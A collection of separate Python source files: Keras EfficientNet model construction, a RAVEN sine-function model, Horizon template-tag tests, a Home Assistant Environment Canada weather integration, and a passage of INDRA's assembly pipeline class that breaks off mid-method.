x = layers.Rescaling(1. / 255.)(x)
x = layers.Normalization(axis=bn_axis)(x)
x = layers.ZeroPadding2D(
padding=imagenet_utils.correct_pad(x, 3),
name='stem_conv_pad')(x)
x = layers.Conv2D(
round_filters(32),
3,
strides=2,
padding='valid',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='stem_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name='stem_bn')(x)
x = layers.Activation(activation, name='stem_activation')(x)
# Build blocks
blocks_args = copy.deepcopy(blocks_args)
b = 0
blocks = float(sum(round_repeats(args['repeats']) for args in blocks_args))
for (i, args) in enumerate(blocks_args):
assert args['repeats'] > 0
# Update block input and output filters based on depth multiplier.
args['filters_in'] = round_filters(args['filters_in'])
args['filters_out'] = round_filters(args['filters_out'])
for j in range(round_repeats(args.pop('repeats'))):
# The first block needs to take care of stride and filter size increase.
if j > 0:
args['strides'] = 1
args['filters_in'] = args['filters_out']
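      # Drop-connect rate grows linearly with block index, from 0 for the
      # first block up to (almost) drop_connect_rate for the last one.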
x = block(
x,
activation,
drop_connect_rate * b / blocks,
name='block{}{}_'.format(i + 1, chr(j + 97)),
**args)
b += 1
# Build top
x = layers.Conv2D(
round_filters(1280),
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='top_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name='top_bn')(x)
x = layers.Activation(activation, name='top_activation')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
if dropout_rate > 0:
x = layers.Dropout(dropout_rate, name='top_dropout')(x)
imagenet_utils.validate_activation(classifier_activation, weights)
x = layers.Dense(
classes,
activation=classifier_activation,
kernel_initializer=DENSE_KERNEL_INITIALIZER,
name='predictions')(x)
else:
if pooling == 'avg':
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
elif pooling == 'max':
x = layers.GlobalMaxPooling2D(name='max_pool')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = layer_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = training.Model(inputs, x, name=model_name)
# Load weights.
if weights == 'imagenet':
if include_top:
file_suffix = '.h5'
file_hash = WEIGHTS_HASHES[model_name[-2:]][0]
else:
file_suffix = '_notop.h5'
file_hash = WEIGHTS_HASHES[model_name[-2:]][1]
file_name = model_name + file_suffix
weights_path = data_utils.get_file(
file_name,
BASE_WEIGHTS_PATH + file_name,
cache_subdir='models',
file_hash=file_hash)
model.load_weights(weights_path)
elif weights is not None:
model.load_weights(weights)
return model
def block(inputs,
activation='swish',
drop_rate=0.,
name='',
filters_in=32,
filters_out=16,
kernel_size=3,
strides=1,
expand_ratio=1,
se_ratio=0.,
id_skip=True):
"""An inverted residual block.
Arguments:
inputs: input tensor.
activation: activation function.
drop_rate: float between 0 and 1, fraction of the input units to drop.
name: string, block label.
filters_in: integer, the number of input filters.
filters_out: integer, the number of output filters.
kernel_size: integer, the dimension of the convolution window.
strides: integer, the stride of the convolution.
expand_ratio: integer, scaling coefficient for the input filters.
se_ratio: float between 0 and 1, fraction to squeeze the input filters.
id_skip: boolean.
Returns:
output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
# Expansion phase
filters = filters_in * expand_ratio
if expand_ratio != 1:
x = layers.Conv2D(
filters,
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'expand_conv')(
inputs)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'expand_bn')(x)
x = layers.Activation(activation, name=name + 'expand_activation')(x)
else:
x = inputs
# Depthwise Convolution
if strides == 2:
x = layers.ZeroPadding2D(
padding=imagenet_utils.correct_pad(x, kernel_size),
name=name + 'dwconv_pad')(x)
conv_pad = 'valid'
else:
conv_pad = 'same'
x = layers.DepthwiseConv2D(
kernel_size,
strides=strides,
padding=conv_pad,
use_bias=False,
depthwise_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'dwconv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'bn')(x)
x = layers.Activation(activation, name=name + 'activation')(x)
# Squeeze and Excitation phase
if 0 < se_ratio <= 1:
filters_se = max(1, int(filters_in * se_ratio))
se = layers.GlobalAveragePooling2D(name=name + 'se_squeeze')(x)
se = layers.Reshape((1, 1, filters), name=name + 'se_reshape')(se)
se = layers.Conv2D(
filters_se,
1,
padding='same',
activation=activation,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'se_reduce')(
se)
se = layers.Conv2D(
filters,
1,
padding='same',
activation='sigmoid',
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'se_expand')(se)
x = layers.multiply([x, se], name=name + 'se_excite')
# Output phase
x = layers.Conv2D(
filters_out,
1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=name + 'project_conv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=name + 'project_bn')(x)
if id_skip and strides == 1 and filters_in == filters_out:
if drop_rate > 0:
x = layers.Dropout(
drop_rate, noise_shape=(None, 1, 1, 1), name=name + 'drop')(x)
x = layers.add([x, inputs], name=name + 'add')
return x
@keras_export('keras.applications.efficientnet.EfficientNetB0',
'keras.applications.EfficientNetB0')
def EfficientNetB0(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.0,
1.0,
224,
0.2,
model_name='efficientnetb0',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB1',
'keras.applications.EfficientNetB1')
def EfficientNetB1(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.0,
1.1,
240,
0.2,
model_name='efficientnetb1',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB2',
'keras.applications.EfficientNetB2')
def EfficientNetB2(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.1,
1.2,
260,
0.3,
model_name='efficientnetb2',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB3',
'keras.applications.EfficientNetB3')
def EfficientNetB3(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.2,
1.4,
300,
0.3,
model_name='efficientnetb3',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB4',
'keras.applications.EfficientNetB4')
def EfficientNetB4(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.4,
1.8,
380,
0.4,
model_name='efficientnetb4',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB5',
'keras.applications.EfficientNetB5')
def EfficientNetB5(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.6,
2.2,
456,
0.4,
model_name='efficientnetb5',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB6',
'keras.applications.EfficientNetB6')
def EfficientNetB6(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
1.8,
2.6,
528,
0.5,
model_name='efficientnetb6',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
@keras_export('keras.applications.efficientnet.EfficientNetB7',
'keras.applications.EfficientNetB7')
def EfficientNetB7(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
**kwargs):
return EfficientNet(
2.0,
3.1,
600,
0.5,
model_name='efficientnetb7',
include_top=include_top,
weights=weights,
input_tensor=input_tensor,
input_shape=input_shape,
pooling=pooling,
classes=classes,
classifier_activation=classifier_activation,
**kwargs)
EfficientNetB0.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB0')
EfficientNetB1.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB1')
EfficientNetB2.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB2')
EfficientNetB3.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB3')
EfficientNetB4.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB4')
EfficientNetB5.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB5')
EfficientNetB6.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB6')
EfficientNetB7.__doc__ = BASE_DOCSTRING.format(name='EfficientNetB7')
@keras_export('keras.applications.efficientnet.preprocess_input')
def preprocess_input(x, data_format=None): # pylint: disable=unused-argument
return x
@keras_export('keras.applications.efficientnet.decode_predictions')
def decode_predictions(preds, top=5):
return imagenet_utils.decode_predictions(preds, top=top)
decode_predictions.__doc__ = imagenet_utils.decode_predictions.__doc__
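# --- Usage sketch (not part of the original module) ---
# A minimal example of building an ImageNet-pretrained B0 and classifying a
# random image; the 224x224 input matches the B0 resolution passed above.
# Assumes TensorFlow/Keras is installed and the weights can be downloaded.
if __name__ == '__main__':
    import numpy as np
    model = EfficientNetB0(weights='imagenet')
    fake_batch = np.random.rand(1, 224, 224, 3) * 255.0  # stand-in RGB image
    preds = model.predict(preprocess_input(fake_batch))
    print(decode_predictions(preds, top=3))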
|
import math
import numpy
def run(self, Input):
number_of_steps = 16
self.time = numpy.zeros(number_of_steps)
uniform = Input["uniform"]
self.out = numpy.zeros(number_of_steps)
for i in range(len(self.time)):
self.time[i] = 0.25*i
time = self.time[i]
self.out[i] = math.sin(time+uniform)
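# --- Driver sketch (not part of the original model) ---
# This module follows the RAVEN external-model convention: `run` is a
# module-level function that receives the model container as `self` and a
# dict of sampled inputs. A bare object can stand in for the container when
# exercising the function outside RAVEN.
if __name__ == '__main__':
    class _Container(object):
        pass
    model = _Container()
    run(model, {"uniform": 0.1})
    print(model.time[:4])
    print(model.out[:4])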
|
import re
from django.conf import settings
from django.template import Context # noqa
from django.template import Template # noqa
from django.utils.text import normalize_newlines # noqa
from horizon.test import helpers as test
from horizon.test.test_dashboards.cats.dashboard import Cats # noqa
from horizon.test.test_dashboards.cats.kittens.panel import Kittens # noqa
from horizon.test.test_dashboards.dogs.dashboard import Dogs # noqa
from horizon.test.test_dashboards.dogs.puppies.panel import Puppies # noqa
def single_line(text):
"""Quick utility to make comparing template output easier."""
return re.sub(' +',
' ',
normalize_newlines(text).replace('\n', '')).strip()
class TemplateTagTests(test.TestCase):
"""Test Custom Template Tag."""
def render_template_tag(self, tag_name, tag_require=''):
tag_call = "{%% %s %%}" % tag_name
return self.render_template(tag_call, tag_require)
def render_template(self, template_text, tag_require='', context={}):
"""Render a Custom Template to string."""
template = Template("{%% load %s %%} %s"
% (tag_require, template_text))
return template.render(Context(context))
def test_site_branding_tag(self):
"""Test if site_branding tag renders the correct setting."""
rendered_str = self.render_template_tag("site_branding", "branding")
self.assertEqual(settings.SITE_BRANDING, rendered_str.strip(),
"tag site_branding renders %s" % rendered_str.strip())
def test_size_format_filters(self):
size_str = ('5|diskgbformat', '10|diskgbformat',
'5555|mb_float_format', '80|mb_float_format',
'.5|mbformat', '0.005|mbformat', '0.0005|mbformat')
expected = u' 5GB 10GB 5.4GB 80MB 512KB 5KB 524Bytes '
text = ''
for size_filter in size_str:
text += '{{' + size_filter + '}} '
rendered_str = self.render_template(tag_require='sizeformat',
template_text=text)
self.assertEqual(expected, rendered_str)
def test_size_format_filters_with_string(self):
size_str = ('"test"|diskgbformat', '"limit"|mb_float_format',
'"no limit"|mbformat')
expected = u' test limit no limit '
text = ''
for size_filter in size_str:
text += '{{' + size_filter + '}} '
rendered_str = self.render_template(tag_require='sizeformat',
template_text=text)
self.assertEqual(expected, rendered_str)
def test_truncate_filter(self):
ctx_string = {'val1': 'he',
'val2': 'hellotrunc',
'val3': 'four'}
text = ('{{test.val1|truncate:1}}#{{test.val2|truncate:4}}#'
'{{test.val3|truncate:10}}')
expected = u' h#h...#four'
rendered_str = self.render_template(tag_require='truncate_filter',
template_text=text,
context={'test': ctx_string})
self.assertEqual(expected, rendered_str)
def test_quota_filter(self):
ctx_string = {'val1': 100,
'val2': 1000,
'val3': float('inf')}
text = ('{{test.val1|quota:"TB"}}#{{test.val2|quota}}#'
'{{test.val3|quota}}')
expected = u' 100 TB Available#1000 Available#No Limit'
rendered_str = self.render_template(tag_require='horizon',
template_text=text,
context={'test': ctx_string})
self.assertEqual(expected, rendered_str)
def test_horizon_main_nav(self):
text = "{% horizon_main_nav %}"
expected = """
<div class='clearfix'>
<ul class=\"nav nav-tabs\">
<li>
<a href=\"/cats/\" tabindex='1'>Cats</a>
</li>
<li>
<a href=\"/dogs/\" tabindex='1'>Dogs</a>
</li>
</ul></div>"""
rendered_str = self.render_template(tag_require='horizon',
template_text=text,
context={'request': self.request})
self.assertEqual(single_line(rendered_str), single_line(expected))
|
"""Platform for retrieving meteorological data from Environment Canada."""
import datetime
import re
from env_canada import ECData # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.weather import (
ATTR_FORECAST_CONDITION,
ATTR_FORECAST_PRECIPITATION_PROBABILITY,
ATTR_FORECAST_TEMP,
ATTR_FORECAST_TEMP_LOW,
ATTR_FORECAST_TIME,
PLATFORM_SCHEMA,
WeatherEntity,
)
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, TEMP_CELSIUS
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt
CONF_FORECAST = "forecast"
CONF_ATTRIBUTION = "Data provided by Environment Canada"
CONF_STATION = "station"
def validate_station(station):
"""Check that the station ID is well-formed."""
if station is None:
return
if not re.fullmatch(r"[A-Z]{2}/s0000\d{3}", station):
raise vol.error.Invalid('Station ID must be of the form "XX/s0000###"')
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Inclusive(CONF_LATITUDE, "latlon"): cv.latitude,
vol.Inclusive(CONF_LONGITUDE, "latlon"): cv.longitude,
vol.Optional(CONF_FORECAST, default="daily"): vol.In(["daily", "hourly"]),
}
)
ICON_CONDITION_MAP = {
"sunny": [0, 1],
"clear-night": [30, 31],
"partlycloudy": [2, 3, 4, 5, 22, 32, 33, 34, 35],
"cloudy": [10],
"rainy": [6, 9, 11, 12, 28, 36],
"lightning-rainy": [19, 39, 46, 47],
"pouring": [13],
"snowy-rainy": [7, 14, 15, 27, 37],
"snowy": [8, 16, 17, 18, 25, 26, 38, 40],
"windy": [43],
"fog": [20, 21, 23, 24, 44],
"hail": [26, 27],
}
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Environment Canada weather."""
if config.get(CONF_STATION):
ec_data = ECData(station_id=config[CONF_STATION])
else:
lat = config.get(CONF_LATITUDE, hass.config.latitude)
lon = config.get(CONF_LONGITUDE, hass.config.longitude)
ec_data = ECData(coordinates=(lat, lon))
add_devices([ECWeather(ec_data, config)])
class ECWeather(WeatherEntity):
"""Representation of a weather condition."""
def __init__(self, ec_data, config):
"""Initialize Environment Canada weather."""
self.ec_data = ec_data
self.platform_name = config.get(CONF_NAME)
self.forecast_type = config[CONF_FORECAST]
@property
def attribution(self):
"""Return the attribution."""
return CONF_ATTRIBUTION
@property
def name(self):
"""Return the name of the weather entity."""
if self.platform_name:
return self.platform_name
return self.ec_data.metadata.get("location")
@property
def temperature(self):
"""Return the temperature."""
if self.ec_data.conditions.get("temperature", {}).get("value"):
return float(self.ec_data.conditions["temperature"]["value"])
if self.ec_data.hourly_forecasts[0].get("temperature"):
return float(self.ec_data.hourly_forecasts[0]["temperature"])
return None
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def humidity(self):
"""Return the humidity."""
if self.ec_data.conditions.get("humidity", {}).get("value"):
return float(self.ec_data.conditions["humidity"]["value"])
return None
@property
def wind_speed(self):
"""Return the wind speed."""
if self.ec_data.conditions.get("wind_speed", {}).get("value"):
return float(self.ec_data.conditions["wind_speed"]["value"])
return None
@property
def wind_bearing(self):
"""Return the wind bearing."""
if self.ec_data.conditions.get("wind_bearing", {}).get("value"):
return float(self.ec_data.conditions["wind_bearing"]["value"])
return None
@property
def pressure(self):
"""Return the pressure."""
if self.ec_data.conditions.get("pressure", {}).get("value"):
return 10 * float(self.ec_data.conditions["pressure"]["value"])
return None
@property
def visibility(self):
"""Return the visibility."""
if self.ec_data.conditions.get("visibility", {}).get("value"):
return float(self.ec_data.conditions["visibility"]["value"])
return None
@property
def condition(self):
"""Return the weather condition."""
icon_code = None
if self.ec_data.conditions.get("icon_code", {}).get("value"):
icon_code = self.ec_data.conditions["icon_code"]["value"]
elif self.ec_data.hourly_forecasts[0].get("icon_code"):
icon_code = self.ec_data.hourly_forecasts[0]["icon_code"]
if icon_code:
return icon_code_to_condition(int(icon_code))
return ""
@property
def forecast(self):
"""Return the forecast array."""
return get_forecast(self.ec_data, self.forecast_type)
def update(self):
"""Get the latest data from Environment Canada."""
self.ec_data.update()
def get_forecast(ec_data, forecast_type):
"""Build the forecast array."""
forecast_array = []
if forecast_type == "daily":
half_days = ec_data.daily_forecasts
if half_days[0]["temperature_class"] == "high":
forecast_array.append(
{
ATTR_FORECAST_TIME: dt.now().isoformat(),
ATTR_FORECAST_TEMP: int(half_days[0]["temperature"]),
ATTR_FORECAST_TEMP_LOW: int(half_days[1]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(half_days[0]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
half_days[0]["precip_probability"]
),
}
)
half_days = half_days[2:]
else:
half_days = half_days[1:]
for day, high, low in zip(range(1, 6), range(0, 9, 2), range(1, 10, 2)):
forecast_array.append(
{
ATTR_FORECAST_TIME: (
dt.now() + datetime.timedelta(days=day)
).isoformat(),
ATTR_FORECAST_TEMP: int(half_days[high]["temperature"]),
ATTR_FORECAST_TEMP_LOW: int(half_days[low]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(half_days[high]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
half_days[high]["precip_probability"]
),
}
)
elif forecast_type == "hourly":
hours = ec_data.hourly_forecasts
for hour in range(0, 24):
forecast_array.append(
{
ATTR_FORECAST_TIME: dt.as_local(
datetime.datetime.strptime(hours[hour]["period"], "%Y%m%d%H%M")
).isoformat(),
ATTR_FORECAST_TEMP: int(hours[hour]["temperature"]),
ATTR_FORECAST_CONDITION: icon_code_to_condition(
int(hours[hour]["icon_code"])
),
ATTR_FORECAST_PRECIPITATION_PROBABILITY: int(
hours[hour]["precip_probability"]
),
}
)
return forecast_array
def icon_code_to_condition(icon_code):
"""Return the condition corresponding to an icon code."""
for condition, codes in ICON_CONDITION_MAP.items():
if icon_code in codes:
return condition
return None
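# --- Sanity sketch (not part of the platform code) ---
# icon_code_to_condition returns the first category whose code list contains
# the code, so codes listed more than once above (e.g. 26 and 27 appear under
# the snow categories and under "hail") resolve to the earlier dict entry;
# unknown codes yield None.
if __name__ == "__main__":
    assert icon_code_to_condition(0) == "sunny"
    assert icon_code_to_condition(13) == "pouring"
    print(icon_code_to_condition(26), icon_code_to_condition(99))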
|
import json
import logging
import inspect
from .decorators import pipeline_functions, register_pipeline
from indra.statements import get_statement_by_name, Statement
logger = logging.getLogger(__name__)
class AssemblyPipeline():
"""An assembly pipeline that runs the specified steps on a given set of
statements.
Ways to initialize and run the pipeline (examples assume you have a list
of INDRA Statements stored in the `stmts` variable.)
>>> from indra.statements import *
>>> map2k1 = Agent('MAP2K1', db_refs={'HGNC': '6840'})
>>> mapk1 = Agent('MAPK1', db_refs={'HGNC': '6871'})
>>> braf = Agent('BRAF')
>>> stmts = [Phosphorylation(map2k1, mapk1, 'T', '185'),
... Phosphorylation(braf, map2k1)]
1) Provide a JSON file containing the steps, then use the classmethod
`from_json_file`, and run it with the `run` method on a list of statements.
This option allows storing pipeline versions in a separate file and
reproducing the same results. All functions referenced in the JSON file
have to be registered with the @register_pipeline decorator.
>>> import os
>>> path_this = os.path.dirname(os.path.abspath(__file__))
>>> filename = os.path.abspath(
... os.path.join(path_this, '..', 'tests', 'pipeline_test.json'))
>>> ap = AssemblyPipeline.from_json_file(filename)
>>> assembled_stmts = ap.run(stmts)
2) Initialize a pipeline with a list of steps and run it with the `run`
method on a list of statements. All functions referenced in steps have to
be registered with the @register_pipeline decorator.
>>> steps = [
... {"function": "filter_no_hypothesis"},
... {"function": "filter_grounded_only",
... "kwargs": {"score_threshold": 0.8}}
... ]
>>> ap = AssemblyPipeline(steps)
>>> assembled_stmts = ap.run(stmts)
3) Initialize an empty pipeline and append/insert the steps one by one.
Provide a function and its args and kwargs. For arguments that
require calling a different function, use the RunnableArgument class. All
functions referenced here have to be either imported and passed as function
objects or registered with the @register_pipeline decorator and passed as
function names (strings). The pipeline built this way can be optionally
saved into a JSON file. (Note that this example requires indra_world
to be installed.)
>>> from indra.tools.assemble_corpus import *
>>> from indra_world.ontology import load_world_ontology
>>> from indra_world.belief import get_eidos_scorer
>>> ap = AssemblyPipeline()
>>> ap.append(filter_no_hypothesis)
>>> ap.append(filter_grounded_only)
>>> ap.append(run_preassembly,
... belief_scorer=RunnableArgument(get_eidos_scorer),
... ontology=RunnableArgument(load_world_ontology))
>>> assembled_stmts = ap.run(stmts)
>>> ap.to_json_file('filename.json')
Parameters
----------
steps : list[dict]
A list of dictionaries representing steps in the pipeline. Each step
should have a 'function' key and, if appropriate, 'args' and 'kwargs'
keys. Arguments can be simple values (strings, integers, booleans,
lists, etc.) or can be functions themselves. In case an argument is a
function or a result of another function, it should also be
represented as a dictionary of a similar structure. If a function
itself is an argument (and not its result), the dictionary should
contain a key-value pair {'no_run': True}. If an argument is a type
of a statement, it should be represented as a dictionary {'stmt_type':
<name of a statement type>}.
"""
def __init__(self, steps=None):
# This import is here to avoid circular imports
# It is enough to import one function to get all registered functions
from indra.tools.assemble_corpus import filter_grounded_only
from indra.ontology.bio import bio_ontology
from indra.preassembler.grounding_mapper.gilda import ground_statements
from indra.preassembler.custom_preassembly import agent_grounding_matches
self.steps = steps if steps else []
@classmethod
def from_json_file(cls, filename):
"""Create an instance of AssemblyPipeline from a JSON file with
steps."""
with open(filename, 'r') as f:
steps = json.load(f)
ap = AssemblyPipeline(steps)
return ap
def to_json_file(self, filename):
"""Save AssemblyPipeline to a JSON file."""
with open(filename, 'w') as f:
json.dump(self.steps, f, indent=1)
def run(self, statements, **kwargs):
"""Run all steps of the pipeline.
Parameters
----------
statements : list[indra.statements.Statement]
A list of INDRA Statements to run the pipeline on.
**kwargs : kwargs
It is recommended to define all arguments for the steps functions
in the steps definition, but it is also possible to provide some
external objects (if it is not possible to provide them as a step
argument) as kwargs to the entire pipeline here. One should be
cautious to avoid kwargs name clashes between multiple functions
(this value will be provided to all functions that expect an
argument with the same name). To overwrite this value in other
functions, provide it explicitly in the corresponding steps kwargs.
Returns
-------
list[indra.statements.Statement]
The list of INDRA Statements resulting from running the pipeline
on the list of input Statements.
"""
logger.info('Running the pipeline')
for step in self.steps:
statements = self.run_function(step, statements, **kwargs)
return statements
def append(self, func, *args, **kwargs):
"""Append a step to the end of the pipeline.
Args and kwargs here can be of any type. All functions referenced here
have to be either imported and passed as function objects or
registered with @register_pipeline decorator and passed as function
names (strings). For arguments that require calling a different
function, use RunnableArgument class.
Parameters
----------
func : str or function
A function or the string name of a function to add to the pipeline.
args : args
Args that are passed to func when calling it.
kwargs : kwargs
Kwargs that are passed to func when calling it.
"""
if inspect.isfunction(func):
func_name = func.__name__
if func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
func_name = func
else:
raise TypeError('Should be a function object or a string')
new_step = self.create_new_step(func_name, *args, **kwargs)
self.steps.append(new_step)
def insert(self, ix, func, *args, **kwargs):
"""Insert a step to any position in the pipeline.
Args and kwargs here can be of any type. All functions referenced here
have to be either imported and passed as function objects or
registered with @register_pipeline decorator and passed as function
names (strings). For arguments that require calling a different
function, use RunnableArgument class.
Parameters
----------
func : str or function
A function or the string name of a function to add to the pipeline.
args : args
Args that are passed to func when calling it.
kwargs : kwargs
Kwargs that are passed to func when calling it.
"""
if inspect.isfunction(func):
func_name = func.__name__
if func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
func_name = func
else:
raise TypeError('Should be a function object or a string')
new_step = self.create_new_step(func_name, *args, **kwargs)
self.steps.insert(ix, new_step)
def create_new_step(self, func_name, *args, **kwargs):
"""Create a dictionary representing a new step in the pipeline.
Parameters
----------
func_name : str
The string name of a function to create as a step.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
dict
A dict structure representing a step in the pipeline.
"""
assert self.get_function_from_name(func_name)
new_step = {'function': func_name}
if args:
new_step['args'] = [jsonify_arg_input(arg) for arg in args]
if kwargs:
new_step['kwargs'] = {
k: jsonify_arg_input(v) for (k, v) in kwargs.items()}
return new_step
@staticmethod
def get_function_parameters(func_dict):
"""Retrieve a function name and arguments from function dictionary.
Parameters
----------
func_dict : dict
A dict structure representing a function and its args and kwargs.
Returns
-------
tuple of str, list and dict
A tuple with the following elements: the name of the function,
the args of the function, and the kwargs of the function.
"""
func_name = func_dict['function']
args = func_dict.get('args', [])
kwargs = func_dict.get('kwargs', {})
return func_name, args, kwargs
@staticmethod
def get_function_from_name(name):
"""Return a function object by name if available or raise exception.
Parameters
----------
name : str
The name of the function.
Returns
-------
function
The function that was found based on its name. If not found,
a NotRegisteredFunctionError is raised.
"""
if name in pipeline_functions:
return pipeline_functions[name]
raise NotRegisteredFunctionError('%s is not registered' % name)
@staticmethod
def run_simple_function(func, *args, **kwargs):
"""Run a simple function and return the result.
Simple here means a function all arguments of which are simple values
(do not require extra function calls).
Parameters
----------
func : function
The function to call.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
object
Any value that the given function returns.
"""
statements = kwargs.pop('statements', None)
if statements is not None:
return func(statements, *args, **kwargs)
return func(*args, **kwargs)
def run_function(self, func_dict, statements=None, **kwargs):
"""Run a given function and return the results.
For each of the arguments, if it requires an extra
function call, recursively call the functions until we get a simple
function.
Parameters
----------
func_dict : dict
A dict representing the function to call, its args and kwargs.
args : args
Args that are passed to the function when calling it.
kwargs : kwargs
Kwargs that are passed to the function when calling it.
Returns
-------
object
Any value that the given function returns.
"""
func_name, func_args, func_kwargs = self.get_function_parameters(
func_dict)
func = self.get_function_from_name(func_name)
logger.info('Calling %s' % func_name)
new_args = []
new_kwargs = {}
for arg in func_args:
arg_value = self.get_argument_value(arg)
new_args.append(arg_value)
for k, v in func_kwargs.items():
kwarg_value = self.get_argument_value(v)
new_kwargs[k] = kwarg_value
if statements is not None:
new_kwargs['statements'] = statements
if kwargs:
for k, v in kwargs.items():
if k not in new_kwargs and k in inspect.getargspec(func).args:
new_kwargs[k] = v
return self.run_simple_function(func, *new_args, **new_kwargs)
@staticmethod
def is_function(argument, keyword='function'):
"""Check if an argument should be converted to a specific object type,
e.g. a function or a statement type.
Parameters
----------
argument : dict or other object
The argument is a dict, its keyword entry is checked, and if it is
there, we return True, otherwise we return False.
keyword : Optional[str]
The keyword to check if it's there if the argument is a dict.
Default: function
"""
if not isinstance(argument, dict):
return False
if keyword not in argument:
return False
return True
def get_argument_value(self, arg_json):
"""Get a value of an argument from its json version."""
if self.is_function(arg_json, 'function'):
# Argument is a function
if arg_json.get('no_run', False):
value = self.get_function_from_name(arg_json['function'])
# Argument is a result of a function
else:
value = self.run_function(arg_json)
# Argument is a statement type
elif self.is_function(arg_json, 'stmt_type'):
value = get_statement_by_name(arg_json.get('stmt_type'))
# Argument is a simple value (str, int, boolean, etc.)
else:
value = arg_json
return value
def __len__(self):
return len(self.steps)
def __iter__(self):
return iter(self.steps)
class NotRegisteredFunctionError(Exception):
pass
class RunnableArgument():
"""Class representing arguments generated by calling a function.
RunnableArguments should be used as args or kwargs in AssemblyPipeline
`append` and `insert` methods.
Parameters
----------
func : str or function
A function or a name of a function to be called to generate argument
value.
"""
def __init__(self, func, *args, **kwargs):
if inspect.isfunction(func):
self.func_name = func.__name__
if self.func_name not in pipeline_functions:
register_pipeline(func)
elif isinstance(func, str):
self.func_name = func
else:
raise TypeError('Should be a function object or a string')
self.args = args
self.kwargs = kwargs
def to_json(self):
"""Jsonify to standard AssemblyPipeline step format."""
json_dict = {'function': self.func_name}
new_args = []
new_kwargs = {}
for arg in self.args:
new_args.append(jsonify_arg_input(arg))
for k, v in self.kwargs.items():
